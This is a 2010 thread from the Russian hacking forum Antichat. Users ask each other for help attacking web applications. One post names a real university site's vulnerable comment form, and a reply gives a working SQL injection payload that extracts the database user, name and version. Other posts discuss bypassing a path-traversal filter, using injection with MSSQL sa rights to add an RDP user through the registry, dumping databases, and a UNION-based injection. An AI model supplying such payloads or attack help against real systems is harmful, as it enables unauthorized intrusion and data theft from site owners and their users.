Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

05.01.2010, 06:51
|
|
Познающий
Регистрация: 21.12.2009
Сообщений: 34
Провел на форуме: 124940
Репутация:
1
|
|
я отправляю этот файл(это у меня txt файл) открываю его прямо в maile и он открывает только код.
|
|
|

05.01.2010, 07:22
|
|
Новичок
Регистрация: 27.02.2007
Сообщений: 8
Провел на форуме: 29882
Репутация:
0
|
|
А чего ты собственно хотел? Это конечно интересно отправлять файл и ждать что он выполнится... Учи матчасть, потом заходи.
|
|
|

05.01.2010, 10:51
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме: 6075534
Репутация:
2731
|
|
Сообщение от Strilo4ka
если не обрезаеться ".', толку то никакого, выше теущего каталого не поднимаешся поидеи!
Пробелы неззя использовать ежу понятно, тоесть вместе должно быть поидеи ".." чтоб перейти в надкаталог, скорее всего регулярка на любое входнеие точки так зачастую, правильно!
может быть обрезаеться слеш , тоесть "/", то можно заменить на "\" если ось win или "\\" если строка в регулярке в двойных кавычках, может быть в начале идет проверка на прямой слеш в регулярке, а потом точка и т.д тоесть если поставить обратный слеш, то фильтр обойдет в win например, а так хз,
вот в win пример:
cd /.. и cd \.. одинаковый результат в win
можно еще попытаться в url-виде может поможет если какой то ids херовый потому что в скрипте если с query_string достаеш то пхп сам в нормальный вид преобразовывает, а тогда идет сравнение...
если не прав то сори имхо мое мнение !!! 
Какой еще слеш? Я, вроде, нормально сказал, обрезается двоеточие, обычным str_replace(), а ты стал про винду, про слеши, про регулярки придумывать.
|
|
|

05.01.2010, 17:22
|
|
Участник форума
Регистрация: 27.03.2008
Сообщений: 288
Провел на форуме: 800727
Репутация:
83
|
|
Друзья, как можно использовать ошибку здесь http://disput.mrsu.ru/art/59/?&comact=0
Если ввести там к примеру, кавычку, то выводится нечто подобное:
Во время добавления комментария произошла неизвестная ошибкаINSERT INTO altx_main_comments (com_id, art_id, user_id, com_user, com_ip, com_time, com_text) VALUES ('', '59', '-1', 'ronald', '5b4c118a', '1262697678', ''')
|
|
|

05.01.2010, 17:26
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме: 556476
Репутация:
66
|
|
вот интересует вопрос по поводу sql inj, как можно добавит имя польз и пасс на удаленого рабочего стола через реестр. Тоесть как примерно составит запрос к базе данных (MSSQL Server 2000) чтоб в последуюшем открыть доступ к RDP
есть привелегия sa
Последний раз редактировалось YuNi|[c; 05.01.2010 в 17:40..
|
|
|

05.01.2010, 17:56
|
|
Участник форума
Регистрация: 27.03.2008
Сообщений: 288
Провел на форуме: 800727
Репутация:
83
|
|
Посмотри, может поможет чем-нибудь:
http://www.xakep.ru/post/50234/
|
|
|

05.01.2010, 19:19
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме: 6075534
Репутация:
2731
|
|
Сообщение от ronald
Друзья, как можно использовать ошибку здесь http://disput.mrsu.ru/art/59/?&comact=0
Если ввести там к примеру, кавычку, то выводится нечто подобное:
Впиши в поле имя:
name', '1', '1', concat_ws(0x3a,user(),database(),version()))#
И по структуре запроса в поле "com_text" запишется concat_ws(0x3a,user(),database(),version()), тобишь юзер:БД:версия
Последний раз редактировалось mailbrush; 05.01.2010 в 19:21..
|
|
|

05.01.2010, 20:19
|
|
Новичок
Регистрация: 26.02.2009
Сообщений: 3
Провел на форуме: 64450
Репутация:
0
|
|
подскажите, как можно скачать себе на комп базу?
|
|
|

05.01.2010, 20:37
|
|
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
Провел на форуме: 5571194
Репутация:
1934
|
|
http://www.mysql.ru/docs/man/mysqldump.html
__________________
Появляюсь редко. Важные дела в реале.
|
|
|

05.01.2010, 21:53
|
|
Новичок
Регистрация: 22.08.2008
Сообщений: 10
Провел на форуме: 149978
Репутация:
6
|
|
Подскажите как быть при такой скуле
ордером кол-во полей показывает, при вводе
.php?id=5+union+select+1,2-- принт полей не выводит, если сменить id на произвольный например 999, то приписывает id к названию таблицы и выдает ошибку, например Table 'sjc5292.table_999' doesn't exist, куда копать?
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|